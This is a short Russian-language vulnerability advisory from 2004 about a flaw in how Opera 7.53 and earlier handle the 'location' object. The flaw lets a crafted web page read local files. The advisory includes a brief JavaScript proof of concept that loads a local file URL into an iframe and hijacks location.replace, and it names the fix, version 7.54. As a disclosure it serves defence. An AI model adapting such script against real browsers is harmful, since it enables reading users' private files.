Удаленный доступ к файлам на системе пользователя в Opera
| Дата публикации: | 08.08.2004 |
| Всего просмотров: | 1984 |
| Опасность: | Средняя |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: Opera 7.53 и более ранние версии
Описание: Уязвимость обнаружена в Opera в обработке 'location' объекта. Удаленный пользователь может читать произвольные файлы на целевой системе пользователя. Удаленный пользователь может сконструировать HTML, который, когда будет загружен целевым пользователем, прочитает файлы на целевой системе пользователе или запустит в контексте удаленного домена. Пример/Эксплоит:
<iframe></iframe>
<script type="text/javascript">
onload=function () {
var oVictim=frames[0];
oVictim.location.href="file://localhost/c:/winnt/help/ciadmin.htm";
oVictim.location.replace=function () {
oVictim.alert("We now have full file system access using
"+location.href);
}
</script>
URL производителя:http://www.opera.com/ Решение:Установите обновленную версию программы (7.54): http://www.opera.com/download/ |
|
| Ссылки: | Opera: Location, Location, Location |